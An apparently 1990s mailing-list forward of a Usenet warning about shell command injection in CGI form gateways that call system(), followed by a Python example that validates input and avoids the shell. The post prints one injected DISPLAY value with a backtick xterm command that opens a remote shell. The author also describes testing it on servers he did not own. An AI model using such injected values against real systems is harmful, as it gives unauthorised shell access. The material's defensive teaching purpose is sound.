> Jeremy Buhler pointed out this useful summary on the hazards of WWW
> forms. The policy implications: I don't think we can afford to have
> amateurs write the back-end scripts for WWW forms. Pity, but that's
> life.
>
> The same is true, of course, of scripts installed in users' .forward
> files to eat incoming mail, or any other scripts written by Joe User
> which accept input from the net at large.
>
> -- Prentiss
> -----------------------------------------------------------------------
>
> > From: bianco@MiSTy.larc.nasa.gov (David Bianco)
> > Subject: Be Careful!! Common security vulnerability w/Fill out forms...
> > Newsgroups: comp.infosystems.www
> > Organization: NASA Langley Research Center, Hampton, VA
> >
> > I was hacking together a piece of code the other day to do some
> > gatewaying from our local whois server to the WWW when a thought about a
> > possible security hole suddenly struck me. I tried it, and to my
> > dismay, it worked... Since it's such an easy problem to have, I
> > thought I'd better share it here. It's probably well-known, but (at
> > least in my case) not well-known enough.
> >
> > Lots of people use input from fill out forms as commandline arguments
> > to the programs they are gatewaying to. This can be good, and it can
> > be bad. It's bad if you do system() or the equivalent, since that
> > will give /bin/sh a chance to parse the commandline before your
> > program ever sees it!
> >
> > As an example, let's say someone writes a gateway to an X11 program
> > which runs on the remote system, and displays on yours (there are a
> > fair number of these on the WWW). Most of the time, they'll ask for a
> > DISPLAY setting to tell them where to show the window. Now, you know
> > they probably didn't rewrite any application code here, so they are
> > going to pass the DISPLAY setting on the commandline to some program.
> > What if you set the DISPLAY to:
> >
> > dew.cs.odu.edu:0.0 `xterm -display dew.cs.odu.edu:0.0`
> >
> > This will frequently have the effect of giving you an xterm under the
> > same UID the WWW server is running under. I tried this. It works.
> > I've already tried it on several WWW servers while I was testing to
> > see how widespread the problem might be. At least one system @ MIT
> > was vulnerable (not anymore, they fixed it almost immediately after I
> > reported it...) as well as some others.
> >
> > If you're running gateways (even just to mail) I urge you to
> > double-check to see if you're bitten by this. I hope I didn't give
> > anyone cardiac arrest when they checked their logs! 8-) If I was able
> > to do this successfully, I notified root & webmaster on your machine...
>
--
Regards,
Bill Manning
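As an added example (not from the original post, nor from any gateway the author describes), the hardened form of the pattern the post warns about: the DISPLAY value from the form is checked against a strict allow-list and then handed to the program as a separate argv element instead of being pasted into a string for system(), so /bin/sh never gets to parse it. The program name xclock and the function names are assumptions.

```python
import re
import subprocess

# Allow-list for an X11 DISPLAY spec: [host]:display[.screen]
# Only hostname characters, a colon and digits; no spaces, backticks,
# semicolons or anything else a shell would interpret.
_DISPLAY_RE = re.compile(r"^[A-Za-z0-9.-]*:[0-9]+(\.[0-9]+)?$")


def validate_display(value: str) -> bool:
    """Return True only if value is a plain DISPLAY spec on the allow-list."""
    return len(value) <= 255 and _DISPLAY_RE.fullmatch(value) is not None


def build_argv(program: str, display: str) -> list:
    """Build the argv list for the gateway program.

    The vulnerable pattern the post describes is roughly
        os.system("xclock -display " + display)
    which lets /bin/sh evaluate backticks inside the form input.
    Here the value is rejected unless it passes the allow-list, and it is
    passed as its own argv element, so it is never parsed by a shell.
    """
    if not validate_display(display):
        raise ValueError("DISPLAY value rejected by allow-list")
    return [program, "-display", display]


def run_gateway(program: str, display: str) -> subprocess.CompletedProcess:
    """Run the program without a shell: a list argv goes straight to exec."""
    argv = build_argv(program, display)
    return subprocess.run(argv, check=False, capture_output=True)


if __name__ == "__main__":
    # Constructed sample inputs: a normal value and the post's injected one.
    good = "dew.cs.odu.edu:0.0"
    bad = "dew.cs.odu.edu:0.0 `xterm -display dew.cs.odu.edu:0.0`"
    print(build_argv("xclock", good))
    try:
        build_argv("xclock", bad)
    except ValueError as exc:
        print("rejected:", exc)
```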